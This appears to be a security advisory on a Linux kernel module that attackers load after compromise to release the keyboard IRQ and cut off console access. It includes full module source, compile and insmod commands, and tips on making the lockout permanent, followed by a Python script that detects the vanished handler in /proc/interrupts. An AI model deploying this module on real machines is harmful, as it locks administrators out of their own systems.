After a system has been compromised, attackers sometimes create a new loadable module on the compromised system that can effectively disable all access to the machine.

Credit:
The information has been provided by bELFaghor.
Reconstruction:
In order to disable access to the machine via the network, the attacker only has to disable the network services; this is not covered in this article.
In order to disable access to the machine via the console/keyboard, you first need to find out which IRQ is assigned to the keyboard. Executing the following command will show this:
# cat /proc/interrupts
0: 397526 timer
1: 8129 keyboard
2: 0 cascade
4: 772 + serial
Then compiling and loading the following module will complete the task of disabling keyboard access (NOTE: if the keyboard IRQ shown in /proc/interrupts is not 1, change the IRQ number in the code below accordingly):
# cat > ivoluan.c << STOP
#define __KERNEL__
#define MODULE
#include <linux/kernel.h>
#include <linux/module.h>

/* Module entry point: release the keyboard interrupt handler (IRQ 1) so
 * that keystrokes are no longer delivered to the kernel. Change the IRQ
 * number here if /proc/interrupts lists the keyboard on another line. */
int init_module(void) {
    free_irq(1, NULL);
    return 0;   /* a non-zero return value would make insmod fail */
}

/* Module exit point: only logs a message; the keyboard handler is not restored. */
void cleanup_module(void) {
    printk("fuck the world i will deny you\n");
}
STOP
# gcc -c ivoluan.c
# insmod ivoluan.o
After the module has been successfully loaded, no keystrokes will reach the kernel any more, thus effectively disabling access from the keyboard to the operating system.
NOTE: This is only a temporary solution, since the module will not be loaded again if the administrator reboots the machine. To disable keyboard access permanently, you would need to recompile the kernel without keyboard support.
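Because free_irq() removes the IRQ's line from /proc/interrupts altogether, an administrator can detect this kind of module by diffing a known-good snapshot of /proc/interrupts against the current one. The following Python script is an added example, not part of the original advisory; the two snapshots are constructed in the old Linux 2.x layout shown above, and the handler name "keyboard" is assumed to be the label the kernel prints for IRQ 1.

```python
import re

# Constructed sample snapshots in the old Linux 2.x /proc/interrupts layout
# used in the advisory (the "+" marks a fast interrupt handler).
BASELINE = """\
 0:     397526   timer
 1:       8129   keyboard
 2:          0   cascade
 4:        772 + serial
"""
# Constructed snapshot taken after the keyboard handler has been released.
CURRENT = """\
 0:     401120   timer
 2:          0   cascade
 4:        790 + serial
"""

LINE_RE = re.compile(r"^\s*(\d+):\s+(\d+)\s+\+?\s*(\S.*?)\s*$")

def parse_interrupts(text):
    """Map IRQ number -> (count, handler name) for each /proc/interrupts line."""
    table = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            table[int(m.group(1))] = (int(m.group(2)), m.group(3))
    return table

def missing_handlers(baseline_text, current_text):
    """Return {irq: name} for handlers present at baseline but gone now.

    free_irq() drops the whole line for that IRQ, so a vanished entry
    (rather than a stalled interrupt count) is the signature to look for.
    """
    before = parse_interrupts(baseline_text)
    after = parse_interrupts(current_text)
    return {irq: name for irq, (_, name) in before.items() if irq not in after}

def keyboard_irq_freed(baseline_text, current_text):
    """True if the IRQ labelled 'keyboard' at baseline has lost its handler."""
    gone = missing_handlers(baseline_text, current_text)
    return any(name == "keyboard" for name in gone.values())

if __name__ == "__main__":
    for irq, name in sorted(missing_handlers(BASELINE, CURRENT).items()):
        print(f"IRQ {irq} ({name}) no longer has a registered handler")
```

On a live system, read /proc/interrupts in place of the constructed strings and pair a positive result with a check of the currently loaded modules (lsmod) to find the module responsible.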